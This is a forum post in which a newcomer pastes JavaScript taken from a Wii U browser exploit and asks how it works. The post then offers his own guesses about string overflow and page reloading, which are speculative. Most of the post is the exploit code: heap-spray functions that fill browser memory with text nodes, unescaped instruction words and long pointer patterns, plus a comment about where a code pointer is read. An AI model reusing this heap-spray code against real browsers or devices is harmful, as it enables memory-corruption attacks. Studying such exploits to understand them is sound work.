Ok, i am asking this just because im curious as to how the wii u exploit is actually being executed...
[spoiler]function sprayOne(mem, size, v)
{
var a = new Uint32Array(size - 20);
for (var j = 0; j < a.length; j++) a[j] = v;
var t = document.createTextNode(String.fromCharCode.apply(null, new Uint32Array(a)));
mem.push(t);
}
function spray(size, n)
{
var string_size = size / 2;
var str = unescape("%u6000%u0000");
var c = unescape("%4bff%fffc");
while (str.length < string_size)
str += c;
var h1 = [];
h1[0] = str.substring(0, string_size);
for (i = 1; i <= n; i++)
h1
= unescape(h1[0]);
return h1;
}
function sprayInc(n)
{
var str = unescape("%u0e9a%u161c%u0000%u0001%u0000%u0002%u0000%u0003%u0000%u0004%u0000%u0005%u0000%u0006%u0000%u0007%u0000%u0008%u0000%u0009%u0000%u000a%u0000%u000b%u0000%u000c%u0000%u000d%u0000%u000e%u0000%u000f");
str += unescape("%u0000%u0010%u0000%u0011%u0000%u0012%u0000%u0013%u0000%u0014%u0000%u0015%u0000%u0016%u0000%u0017%u0000%u0018%u0000%u0019%u0000%u001a%u0000%u001b%u0000%u001c%u0000%u001d%u0000%u001e%u0000%u001f");
str += unescape("%u0000%u0020%u0000%u0021%u0000%u0022%u0000%u0023%u0000%u0024%u0000%u0025%u0000%u0026%u0000%u0027%u0000%u0028%u0000%u0029%u0000%u002a%u0000%u002b%u0000%u002c%u0000%u002d%u0000%u002e%u0000%u002f");
str += unescape("%u0000%u0030%u0000%u0031%u0000%u0032%u0000%u0033%u0000%u0034%u0000%u0035%u0000%u0036%u0000%u0037%u0000%u0038%u0000%u0039%u0000%u003a%u0000%u003b%u0000%u003c%u0000%u003d%u0000%u003e%u0000%u003f");
str += unescape("%u0000%u0040%u0000%u0041%u0000%u0042%u0000%u0043%u0000%u0044%u0000%u0045%u0000%u0046%u0000%u0047%u0000%u0048%u0000%u0049%u0000%u004a%u0000%u004b%u0000%u004c%u0000%u004d%u0000%u004e%u0000%u004f");
str += unescape("%u0000%u0050%u0000%u0051%u0000%u0052%u0000%u0053%u0000%u0054%u0000%u0055%u0000%u0056%u0000%u0057%u0000%u0058%u0000%u0059%u0000%u005a%u0000%u005b%u0000%u005c%u0000%u005d%u0000%u005e%u0000%u005f");
str += unescape("%u0000%u0060%u0000%u0061%u0000%u0062%u0000%u0063%u0000%u0064%u0000%u0065%u0000%u0066%u0000%u0067%u0000%u0068%u0000%u0069%u0000%u006a%u0000%u006b%u0000%u006c%u0000%u006d%u0000%u006e%u0000%u006f");
str += unescape("%u0000%u0070%u0000%u0071%u0000%u0072%u0000%u0073%u0000%u0074%u0000%u0075%u0000%u0076%u0000%u0077%u0000%u0078%u0000%u0079%u0000%u007a%u0000%u007b%u0000%u007c%u0000%u007d%u0000%u007e%u0000%u007f");
str += unescape("%u0000%u0080%u0000%u0081%u0000%u0082%u0000%u0083%u0000%u0084%u0000%u0085%u0000%u0086%u0000%u0087%u0000%u0088%u0000%u0089%u0000%u008a%u0000%u008b%u0000%u008c%u0000%u008d%u0000%u008e%u0000%u008f");
str += unescape("%u0000%u0090%u0000%u0091%u0000%u0092%u0000%u0093%u0000%u0094%u0000%u0095%u0000%u0096%u0000%u0097%u0000%u0098%u0000%u0099%u0000%u009a%u0000%u009b%u0000%u009c%u0000%u009d%u0000%u009e%u0000%u009f");
str += unescape("%u0000%u00a0%u0000%u00a1%u0000%u00a2%u0000%u00a3%u0000%u00a4%u0000%u00a5%u0000%u00a6%u0000%u00a7%u0000%u00a8%u0000%u00a9%u0000%u00aa%u0000%u00ab%u0000%u00ac%u0000%u00ad%u0000%u00ae%u0000%u00af");
str += unescape("%u0000%u00b0%u0000%u00b1%u0000%u00b2%u0000%u00b3%u0000%u00b4%u0000%u00b5%u0000%u00b6%u0000%u00b7%u0000%u00b8%u0000%u00b9%u0000%u00ba%u0000%u00bb%u0000%u00bc%u0000%u00bd%u0000%u00be%u0000%u00bf");
str += unescape("%u0000%u00c0%u0000%u00c1%u0000%u00c2%u0000%u00c3%u0000%u00c4%u0000%u00c5%u0000%u00c6%u0000%u00c7%u0000%u00c8%u0000%u00c9%u0000%u00ca%u0000%u00cb%u0000%u00cc%u0000%u00cd%u0000%u00ce%u0000%u00cf");
str += unescape("%u0000%u00d0%u0000%u00d1%u0000%u00d2%u0000%u00d3%u0000%u00d4%u0000%u00d5%u0000%u00d6%u0000%u00d7%u0000%u00d8%u0000%u00d9%u0000%u00da%u0000%u00db%u0000%u00dc%u0000%u00dd%u0000%u00de%u0000%u00df");
str += unescape("%u0000%u00e0%u0000%u00e1%u0000%u00e2%u0000%u00e3%u0000%u00e4%u0000%u00e5%u0000%u00e6%u0000%u00e7%u0000%u00e8%u0000%u00e9%u0000%u00ea%u0000%u00eb%u0000%u00ec%u0000%u00ed%u0000%u00ee%u0000%u00ef");
str += unescape("%u0000%u00f0%u0000%u00f1%u0000%u00f2%u0000%u00f3%u0000%u00f4%u0000%u00f5%u0000%u00f6%u0000%u00f7%u0000%u00f8%u0000%u00f9%u0000%u00fa%u0000%u00fb%u0000%u00fc%u0000%u00fd%u0000%u00fe%u0000%u00ff");
str += unescape("%u0000%u0100%u0000%u0101%u0000%u0102%u0000%u0103%u0000%u0104%u0000%u0105%u0000%u0106%u0000%u0107%u0000%u0108%u0000%u0109%u0000%u010a%u0000%u010b%u0e9a%u161c%u0000%u010d%u0000%u010e%u0000%u010f");
str += unescape("%u0000%u0110%u0000%u0111%u0000%u0112%u0000%u0113%u0000%u0114%u0000%u0115%u0000%u0116%u0000%u0117%u0000%u0118%u0000%u0119%u0000%u011a%u0000%u011b%u0000%u011c%u0000%u011d%u0000%u011e%u0000%u011f");
str += unescape("%u0000%u0120%u0000%u0121%u0000%u0122%u0000%u0123%u0000%u0124%u0000%u0125%u0000%u0126%u0000%u0127%u0000%u0128%u0000%u0129%u0000%u012a%u0000%u012b%u0000%u012c%u0000%u012d%u0000%u012e%u0000%u012f");
str += unescape("%u0000%u0130%u0000%u0131%u0000%u0132%u0000%u0133%u0000%u0134%u0000%u0135%u0000%u0136%u0000%u0137%u0000%u0138%u0000%u0139%u0000%u013a%u0000%u013b%u0000%u013c%u0000%u013d%u0000%u013e%u0000%u013f");
str += unescape("%u0000%u0140%u0000%u0141%u0000%u0142%u0000%u0143%u0000%u0144%u0000%u0145%u0000%u0146%u0000%u0147%u0000%u0148%u0000%u0149%u0000%u014a%u0000%u014b%u0000%u014c%u0000%u014d%u0000%u014e%u0000%u014f");
str += unescape("%u0000%u0150%u0000%u0151%u0000%u0152%u0000%u0153%u0000%u0154%u0000%u0155%u0000%u0156%u0000%u0157%u0000%u0158%u0000%u0159%u0000%u015a%u0000%u015b%u0000%u015c%u0000%u015d%u0000%u015e%u0000%u015f");
var h1 = [];
h1[0] = str.substring(0, str.length);
for (i = 1; i <= n; i++)
h1 = unescape(h1[0]);
return h1;
}
function dsm(evnt)
{
// spray
var mem = [];
for (var j = 20; j < 2048; j++) sprayOne(mem, j, 0x1dd7b2c8);
// the code pointer will be read from value + 0x660
// 0x4 only if we spray 0
}
//var mem = dsm();
//alert(mem.length);
//var pointer = sprayPointer();
var pointer = sprayInc(30000);
//var code = spray(0x2c0, 60000);
//alert(pointer.length);
//alert(code.length);[/spoiler]
So this is the data (in the spoiler) that i pulled from the exploit... it seems to me that they are using the amount of memory the string is allotted to achieve the exploit. Im assuming that with the wii u, when the string is added to itself over and over and over, eventually the string exceeds the amount of memory it is allowed to hold, effectively overwriting important data that is causing the crash. Then the var h1 is getting actual address of it so that the user can later inject the code?
im kind of new to this, ive had about a year of c++ programming under my belt and none of that deals with actually causing a buffer overflow... but a lot of it has been fixing my own, out of range, overflows, and memory leak errors... .. so am i somewhat right hopefully? lol
also, i believe the reason the exploit does not crash the vita and just reloads the page is because once the maximum amount of memory the string is allowed to hold is reached, it just reloads the page (like a refresh) to clear the previous data... instead of letting the string continue to write data were it shouldn't :S
Advertising